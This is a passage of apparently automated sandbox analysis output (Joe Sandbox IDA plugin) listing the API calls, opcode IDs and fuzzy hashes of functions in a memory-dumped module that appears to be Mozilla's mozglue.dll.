                                                                  • String ID: NtUnmapViewOfSection$ntdll.dll
                                                                  • API String ID: 145871493-1050664331
                                                                  • Opcode ID: b7848fc4df236f907062246cac4817bd64d2790fae9fb925db347aefa4e47658
                                                                  • Instruction ID: 1731746bf85203a7db08dd89a56643e8c450b4d864b894538bd62530c61ba253
                                                                  • Opcode Fuzzy Hash: b7848fc4df236f907062246cac4817bd64d2790fae9fb925db347aefa4e47658
                                                                  • Instruction Fuzzy Hash: 74E01A70214712ABDF285BA9EC2C7013AB8F706258F10D159ED0DD1A90E77580428B54
                                                                  APIs
                                                                  • memset.VCRUNTIME140(?,00000000,?,?,6CA1BE49), ref: 6CA1BEC4
                                                                  • RtlCaptureStackBackTrace.NTDLL ref: 6CA1BEDE
                                                                  • memset.VCRUNTIME140(00000000,00000000,-00000008,?,6CA1BE49), ref: 6CA1BF38
                                                                  • RtlReAllocateHeap.NTDLL ref: 6CA1BF83
                                                                  • RtlFreeHeap.NTDLL(6CA1BE49,00000000), ref: 6CA1BFA6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
                                                                  • String ID:
                                                                  • API String ID: 2764315370-0
                                                                  • Opcode ID: b5e2e2d61fd0228d8562d5e106ea31e02abc10a0cb3c3a08003d3d4a7d61fcb3
                                                                  • Instruction ID: 505ee8868e17c4848f6c681cd999321feb7f2722c8af43fb6cd1844667769ad8
                                                                  • Opcode Fuzzy Hash: b5e2e2d61fd0228d8562d5e106ea31e02abc10a0cb3c3a08003d3d4a7d61fcb3
                                                                  • Instruction Fuzzy Hash: 7C51C3B1A042018FE714DF69DD80B9AB3A2FF88314F298639D515A7F54D730F9868B80
                                                                  APIs
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6C9FB58D,?,?,?,?,?,?,?,6CA2D734,?,?,?,6CA2D734), ref: 6CA08E6E
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C9FB58D,?,?,?,?,?,?,?,6CA2D734,?,?,?,6CA2D734), ref: 6CA08EBF
                                                                  • free.MOZGLUE(?,?,?,?,6C9FB58D,?,?,?,?,?,?,?,6CA2D734,?,?,?), ref: 6CA08F24
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C9FB58D,?,?,?,?,?,?,?,6CA2D734,?,?,?,6CA2D734), ref: 6CA08F46
                                                                  • free.MOZGLUE(?,?,?,?,6C9FB58D,?,?,?,?,?,?,?,6CA2D734,?,?,?), ref: 6CA08F7A
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C9FB58D,?,?,?,?,?,?,?,6CA2D734,?,?,?), ref: 6CA08F8F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: freemalloc
                                                                  • String ID:
                                                                  • API String ID: 3061335427-0
                                                                  • Opcode ID: c6c96284196e8adc0fcac1cc3d02c9a48a29ad3240f0abba1bce4150230b244d
                                                                  • Instruction ID: e6cc3e8b2aad6808c239c93a12a5ee2351ebdc3aa9adfc295a3d60e14d3df474
                                                                  • Opcode Fuzzy Hash: c6c96284196e8adc0fcac1cc3d02c9a48a29ad3240f0abba1bce4150230b244d
                                                                  • Instruction Fuzzy Hash: 8F51DFB5B012168FEB14CF68E88076E73B2FF45348F29052AD916AB740E731F945CBA5
                                                                  APIs
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C9C5FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C9C60F4
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,6C9C5FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C9C6180
                                                                  • free.MOZGLUE(?,?,?,?,6C9C5FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C9C6211
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C9C5FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C9C6229
                                                                  • free.MOZGLUE(?,?,?,?,6C9C5FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C9C625E
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C9C5FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C9C6271
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: freemalloc
                                                                  • String ID:
                                                                  • API String ID: 3061335427-0
                                                                  • Opcode ID: e61bf209f969e28808819316876d2f63aa902a5cfffe8865b2261c698daafa5c
                                                                  • Instruction ID: 8d31db1ffece3b92916ac1d3ae4b7a1ee3852ff7e0fbedbbb272c5d2efa18a56
                                                                  • Opcode Fuzzy Hash: e61bf209f969e28808819316876d2f63aa902a5cfffe8865b2261c698daafa5c
                                                                  • Instruction Fuzzy Hash: B25156B1B002468BEB14CFA8D8907BEB7B5AB49308F204539C616D7711E731EA55CB63
                                                                  APIs
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6CA02620,?,?,?,6C9F60AA,6C9F5FCB,6C9F79A3), ref: 6CA0284D
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6CA02620,?,?,?,6C9F60AA,6C9F5FCB,6C9F79A3), ref: 6CA0289A
                                                                  • free.MOZGLUE(?,?,?,6CA02620,?,?,?,6C9F60AA,6C9F5FCB,6C9F79A3), ref: 6CA028F1
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6CA02620,?,?,?,6C9F60AA,6C9F5FCB,6C9F79A3), ref: 6CA02910
                                                                  • free.MOZGLUE(00000001,?,?,6CA02620,?,?,?,6C9F60AA,6C9F5FCB,6C9F79A3), ref: 6CA0293C
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(00200000,?,?,6CA02620,?,?,?,6C9F60AA,6C9F5FCB,6C9F79A3), ref: 6CA0294E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: freemalloc
                                                                  • String ID:
                                                                  • API String ID: 3061335427-0
                                                                  • Opcode ID: adf7f41199faf831aac0bb61bdee2245ba6de12fc04380c60b393a02d71f7dbd
                                                                  • Instruction ID: 5c6c12561ad4fed68c830436edc17d2dc010666d754a5b8311d5b6b254646228
                                                                  • Opcode Fuzzy Hash: adf7f41199faf831aac0bb61bdee2245ba6de12fc04380c60b393a02d71f7dbd
                                                                  • Instruction Fuzzy Hash: D241C1B5B007068FEB14CFA8E88876A73F5BB4538CF144629D566EB740E731E944CB51
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6CA3E784), ref: 6C9BCFF6
                                                                  • LeaveCriticalSection.KERNEL32(6CA3E784), ref: 6C9BD026
                                                                  • VirtualAlloc.KERNEL32(00000000,00100000,00001000,00000004), ref: 6C9BD06C
                                                                  • VirtualFree.KERNEL32(00000000,00100000,00004000), ref: 6C9BD139
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSectionVirtual$AllocEnterFreeLeave
                                                                  • String ID: MOZ_CRASH()
                                                                  • API String ID: 1090480015-2608361144
                                                                  • Opcode ID: c19e4c3fc883f561c6f572b1063d0cbf1a56461bb0b9e7b93365144f71e6a34d
                                                                  • Instruction ID: 7e2836fa5a2687504a2f5fe5781998886324340454a101bc874bd810c2bb1d34
                                                                  • Opcode Fuzzy Hash: c19e4c3fc883f561c6f572b1063d0cbf1a56461bb0b9e7b93365144f71e6a34d
                                                                  • Instruction Fuzzy Hash: 4E41C332B017169FCB28CE6C8CA836A36B5EB4A714F144139E91CE7788D7B19C028BD0
                                                                  APIs
                                                                  • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C9B4E5A
                                                                  • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C9B4E97
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C9B4EE9
                                                                  • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C9B4F02
                                                                  • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C9B4F1E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
                                                                  • String ID:
                                                                  • API String ID: 713647276-0
                                                                  • Opcode ID: b67fd1a79debd03845ade3963d2b7f9f42f4f8da841abe7aa80fb5c560c046fe
                                                                  • Instruction ID: d9104f7fe088939f46d91eea6d5d6ef1b03014543aba6a9f74f70b05d0c98aa3
                                                                  • Opcode Fuzzy Hash: b67fd1a79debd03845ade3963d2b7f9f42f4f8da841abe7aa80fb5c560c046fe
                                                                  • Instruction Fuzzy Hash: 0741BF71608701AFC705CF69C88095BB7E8FF99344F108A2DF866A7741DB30E958DB92
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6CA3F770), ref: 6CA1A858
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA1A87B
                                                                    • Part of subcall function 6CA1A9D0: memcpy.VCRUNTIME140(?,?,00000400,?,?,?,6CA1A88F,00000000), ref: 6CA1A9F1
                                                                  • _ltoa_s.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000020,0000000A), ref: 6CA1A8FF
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA1A90C
                                                                  • LeaveCriticalSection.KERNEL32(6CA3F770), ref: 6CA1A97E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSectionstrlen$EnterLeave_ltoa_smemcpy
                                                                  • String ID:
                                                                  • API String ID: 1355178011-0
                                                                  • Opcode ID: 34c58a742afaa0a38fd6e330b790bf620ef3505851e66b0937ae3a4f27e83632
                                                                  • Instruction ID: 3f60e3cbbaa156865728f862538364a9410811cf422b2fc30419d2632041e3f1
                                                                  • Opcode Fuzzy Hash: 34c58a742afaa0a38fd6e330b790bf620ef3505851e66b0937ae3a4f27e83632
                                                                  • Instruction Fuzzy Hash: 214180B0E002488FDB00DFE8D845ADEBB71FF04324F148629E81AAB791D735D989CB91
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(-00000002,?,6C9C152B,?,?,?,?,6C9C1248,?), ref: 6C9C159C
                                                                  • memcpy.VCRUNTIME140(00000023,?,?,?,?,6C9C152B,?,?,?,?,6C9C1248,?), ref: 6C9C15BC
                                                                  • moz_xmalloc.MOZGLUE(-00000001,?,6C9C152B,?,?,?,?,6C9C1248,?), ref: 6C9C15E7
                                                                  • free.MOZGLUE(?,?,?,?,?,?,6C9C152B,?,?,?,?,6C9C1248,?), ref: 6C9C1606
                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C9C152B,?,?,?,?,6C9C1248,?), ref: 6C9C1637
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
                                                                  • String ID:
                                                                  • API String ID: 733145618-0
                                                                  • Opcode ID: c496368404a05f0a37fa6adf70506568a7c91a5f3a27e73830476c084281c6da
                                                                  • Instruction ID: 9042fdf8974ffb4e429840cf4a52ffa74f46c3efa2caf69366a215920d86bb72
                                                                  • Opcode Fuzzy Hash: c496368404a05f0a37fa6adf70506568a7c91a5f3a27e73830476c084281c6da
                                                                  • Instruction Fuzzy Hash: 49310572B001158BCB188E78D95047E77A9FB923747280B2DE823DBBD4EB30D9158797
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6CA2E330,?,6C9DC059), ref: 6CA1AD9D
                                                                    • Part of subcall function 6C9CCA10: malloc.MOZGLUE(?), ref: 6C9CCA26
                                                                  • memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6CA2E330,?,6C9DC059), ref: 6CA1ADAC
                                                                  • free.MOZGLUE(?,?,?,?,00000000,?,?,6CA2E330,?,6C9DC059), ref: 6CA1AE01
                                                                  • GetLastError.KERNEL32(?,00000000,?,?,6CA2E330,?,6C9DC059), ref: 6CA1AE1D
                                                                  • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6CA2E330,?,6C9DC059), ref: 6CA1AE3D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$freemallocmemsetmoz_xmalloc
                                                                  • String ID:
                                                                  • API String ID: 3161513745-0
                                                                  • Opcode ID: b056cc1ed8aebbeb56e98d50ba8ea1f6195af24211d90bbcd5fc73e22cba4897
                                                                  • Instruction ID: 0dcaceae143a5ecaf15d6e10056e238f65c22c2c09d0f261cfbeab088b9623cf
                                                                  • Opcode Fuzzy Hash: b056cc1ed8aebbeb56e98d50ba8ea1f6195af24211d90bbcd5fc73e22cba4897
                                                                  • Instruction Fuzzy Hash: 5A3182B1A003259FDB10DF798D44AABBBF9EF49614F158429E84AD7740E734DC48CBA0
                                                                  APIs
                                                                  • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6CA2DCA0,?,?,?,6C9EE8B5,00000000), ref: 6CA15F1F
                                                                  • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C9EE8B5,00000000), ref: 6CA15F4B
                                                                  • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6C9EE8B5,00000000), ref: 6CA15F7B
                                                                  • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6C9EE8B5,00000000), ref: 6CA15F9F
                                                                  • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C9EE8B5,00000000), ref: 6CA15FD6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
                                                                  • String ID:
                                                                  • API String ID: 1389714915-0
                                                                  • Opcode ID: 91611166587d7ba9468c7528af4bef97a3755c26463b7b971f3deb01fc30db42
                                                                  • Instruction ID: ed6604d64c4b6b41b5d9de1d0c9a8b1df06753534a32f40ac17af177944788a8
                                                                  • Opcode Fuzzy Hash: 91611166587d7ba9468c7528af4bef97a3755c26463b7b971f3deb01fc30db42
                                                                  • Instruction Fuzzy Hash: 31310F34304A018FD725CF29D898E2AB7F6FF89359B688558F55A87B95C731EC42CB80
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 6C9BB532
                                                                  • moz_xmalloc.MOZGLUE(?), ref: 6C9BB55B
                                                                  • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C9BB56B
                                                                  • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C9BB57E
                                                                  • free.MOZGLUE(00000000), ref: 6C9BB58F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
                                                                  • String ID:
                                                                  • API String ID: 4244350000-0
                                                                  • Opcode ID: 548a0f267f0a0eb919152c81fa0326385f37a403d578a16563fdf17be214ae0d
                                                                  • Instruction ID: 1af5e8f575965d0fcb589f393f6a76ef835b9885ad5c18fafa3cdd11f8ac577f
                                                                  • Opcode Fuzzy Hash: 548a0f267f0a0eb919152c81fa0326385f37a403d578a16563fdf17be214ae0d
                                                                  • Instruction Fuzzy Hash: 40210A71600205ABDB009F68CD80B6FBBB9FF41308F28412DE918EB381E775D911C7A1
                                                                  APIs
                                                                  • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C9BB7CF
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C9BB808
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C9BB82C
                                                                  • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C9BB840
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9BB849
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: free$?vprint@PrintfTarget@mozilla@@mallocmemcpy
                                                                  • String ID:
                                                                  • API String ID: 1977084945-0
                                                                  • Opcode ID: bda6d987e188ea44a44710cd9d5ec954d304665336f49ca3dc68fcd81403902d
                                                                  • Instruction ID: 112567f48f51a950f37b2fd90ce5daded0ebad41fbba8db2d89d3a1490b633c9
                                                                  • Opcode Fuzzy Hash: bda6d987e188ea44a44710cd9d5ec954d304665336f49ca3dc68fcd81403902d
                                                                  • Instruction Fuzzy Hash: 0B214DB5E002199FDF04DFA9C8855BFBBB4EF49718F148169EC0AA7341E735A944CBA0
                                                                  APIs
                                                                  • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6CA16E78
                                                                    • Part of subcall function 6CA16A10: InitializeCriticalSection.KERNEL32(6CA3F618), ref: 6CA16A68
                                                                    • Part of subcall function 6CA16A10: GetCurrentProcess.KERNEL32 ref: 6CA16A7D
                                                                    • Part of subcall function 6CA16A10: GetCurrentProcess.KERNEL32 ref: 6CA16AA1
                                                                    • Part of subcall function 6CA16A10: EnterCriticalSection.KERNEL32(6CA3F618), ref: 6CA16AAE
                                                                    • Part of subcall function 6CA16A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6CA16AE1
                                                                    • Part of subcall function 6CA16A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6CA16B15
                                                                    • Part of subcall function 6CA16A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6CA16B65
                                                                    • Part of subcall function 6CA16A10: LeaveCriticalSection.KERNEL32(6CA3F618,?,?), ref: 6CA16B83
                                                                  • MozFormatCodeAddress.MOZGLUE ref: 6CA16EC1
                                                                  • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6CA16EE1
                                                                  • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6CA16EED
                                                                  • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6CA16EFF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
                                                                  • String ID:
                                                                  • API String ID: 4058739482-0
                                                                  • Opcode ID: eaae8f38b5f2999a888beb8dc8d8dc82ddcd4a6367e066ac9a487086fee36d4f
                                                                  • Instruction ID: 2bcb6020a438593049eeb6e88593ea8f78a4908bee2aef3b301d63d6b8945c4b
                                                                  • Opcode Fuzzy Hash: eaae8f38b5f2999a888beb8dc8d8dc82ddcd4a6367e066ac9a487086fee36d4f
                                                                  • Instruction Fuzzy Hash: D921A171A0831A8BCB14CF29DC8569A77F5EF88308F048139E80DD7340DB309A498F92
                                                                  APIs
                                                                  • WideCharToMultiByte.KERNEL32 ref: 6CA176F2
                                                                  • moz_xmalloc.MOZGLUE(00000001), ref: 6CA17705
                                                                    • Part of subcall function 6C9CCA10: malloc.MOZGLUE(?), ref: 6C9CCA26
                                                                  • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CA17717
                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6CA1778F,00000000,00000000,00000000,00000000), ref: 6CA17731
                                                                  • free.MOZGLUE(00000000), ref: 6CA17760
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
